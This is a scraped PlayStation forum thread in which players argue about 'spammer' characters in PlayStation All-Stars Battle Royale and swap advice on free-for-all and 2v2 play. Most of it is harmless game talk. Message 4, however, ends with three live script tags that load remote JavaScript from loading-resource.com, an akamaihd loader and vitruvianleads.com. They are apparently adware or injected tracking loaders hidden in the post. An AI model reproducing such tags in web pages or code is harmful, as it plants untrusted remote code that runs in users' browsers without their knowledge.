-Raiden

-Drake

-Sly Cooper

-Sackboy

-Radec

-Dante

-Jak

-Ratchet

Whenever I see one of the aforementioned characters, they're not usually spammers; they ALWAYS are.

Will this be fixed somehow, you think?

http://community.us.playstation.com/t5/PlayStation-All-Stars-Battle/OFFICIAL-GEX-for-PSASBR-Thread-Sony-Santa-Monica-Please-Read/m-p/40066215/
Message 1 of 17 (458 Views)
Hekseville Citizen
272 posts

Re: Starting to feel like...

Jan 12, 2013
I don't even play online anynore, just local. I agree, it doesn't bother me, but it just makes the game....how do you say?...Stale? I atleast use every character, may get beat, but whats the fun of having multiple characters if you only use 1
Message 2 of 17 (456 Views)
0 Likes
Lombax Warrior
218 posts

Jan 12, 2013
-Evil Cole
-Toro
Message 3 of 17 (432 Views)
Gaming Beast
2167 posts

Jan 12, 2013
So we're complaining about 11/20 characters? Don't you think at that point the problem may come from the people unable to deal with all of this?

I don't even know how Dante could spam.

I also see more Spike spammers (So 12 now?) than any kind of Sackboy, and why are we complaining about Jak again?

My advice would be what it always is: Instead of looking at things and thinking "OMG BROKEN!", look at it and think "How do I get around that?".

I was teaching a friend to play this game. Within 2 hours of playing the game, while he does suck (What can you expect having played so little?), he had already figured out how to get around Kratos spam, Radec, Sly in general and was starting to figure out Drake.
He still got beat by many of them due to a gross lack of experience with the game (Every time he saw a new move it would rape him essentially), but he figured out spammers in just a few hours despite not even owning the freaking game or console!

So my question is this: How are people still having trouble with this?

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 4 of 17 (411 Views)
First Son
1 posts

Jan 12, 2013

The problem with FFA is that there's very little reason to play anything but a poking game. Opportunities to combo uninterupted are few and far between. It's why FFA isn't taken all that seriously as a competitive game mode. Those that do usually don't have much experience in other fighting games.

In 2v2, dealing with projectiles is pretty easy if you're playing with a friend. Since you can coordinate better, you generally end up with your partner keeping tabs and harassing one opponent, giving you free range to approach the other. At this point, projectile tossing is a very limited stategy, and small, one-off AP gains simply won't compare to something like a full ground combo.

For characters like Kratos, his F.Square loses it's muster when he's forced into one-on-one scenarios. If you stay grounded and stymy block as you approach, opening him up using characters with seemingly more limited toolsets isn't just doable, but very doable.

In short, FFA is a joke because playing better means avoiding close-range exchanges entirely. Even if you're alone with an opponent on the other side of the map and you're landing a sick AP burst combo, there's a good chance someone on the other side of the map is doing the same.

In 2v2, having a trusted partner means you can convert good reads into huge meter gain without the fear of getting a random cake in the face.

Message 5 of 17 (405 Views)
Splicer
84 posts

Jan 12, 2013

Krackatao wrote:

The problem with FFA is that there's very little reason to play anything but a poking game. Opportunities to combo uninterupted are few and far between. It's why FFA isn't taken all that seriously as a competitive game mode. Those that do usually don't have much experience in other fighting games.

In 2v2, dealing with projectiles is pretty easy if you're playing with a friend. Since you can coordinate better, you generally end up with your partner keeping tabs and harassing one opponent, giving you free range to approach the other. At this point, projectile tossing is a very limited stategy, and small, one-off AP gains simply won't compare to something like a full ground combo.

For characters like Kratos, his F.Square loses it's muster when he's forced into one-on-one scenarios. If you stay grounded and stymy block as you approach, opening him up using characters with seemingly more limited toolsets isn't just doable, but very doable.

In short, FFA is a joke because playing better means avoiding close-range exchanges entirely. Even if you're alone with an opponent on the other side of the map and you're landing a sick AP burst combo, there's a good chance someone on the other side of the map is doing the same.

In 2v2, having a trusted partner means you can convert good reads into huge meter gain without the fear of getting a random cake in the face.

I can't help but feel like people who consistently win at FFA's are still pretty skilled. Like you just explained, FFA requires that you manage a lot more enemies, so frequently winning is probably indicative of being able to beat most people.

"ULAKSKEEL"
Message 6 of 17 (321 Views)
0 Likes
Wastelander
726 posts

Jan 12, 2013
Dante? Spamming? -shakes head-

1/6/2013 - Defeated the #1 player in the World in a Ranked Match.

Currently maining: Parappa

Future mains: Zeus, Issac
Message 7 of 17 (297 Views)
0 Likes
Last Guardian
9918 posts

Jan 12, 2013
There's always quick match. Which is what I play.
 photo Hammer Girl_zpsnrg29qur.jpg
Message 8 of 17 (294 Views)
0 Likes
Wastelander
587 posts

Jan 12, 2013

Same kind of issues appear in quick match as well, though. There's only less stress because you don't have to worry about belt ranks.

Message 9 of 17 (284 Views)
0 Likes
Survivor
2365 posts

Jan 12, 2013
This is why I made a 1v1 league, and am working on a 2v2 league now.

FFA IS fun and has it's own competitive style, but some of these things "spammers" do just work better. Playing FFA shows your FFA skills, not your skill at fighting overall. It's too different of a match to play.

Now, I'm not saying FFA players aren't good fighters, far from it. But FFA takes a different skill set. If you fight your 1v1 matches like you would and FFA you will be beaten. The moves these People use over and over just plain work in an FFA setting: they obviously are working on you as well as many other people of they wouldn't use them either.
Message 10 of 17 (250 Views)
0 Likes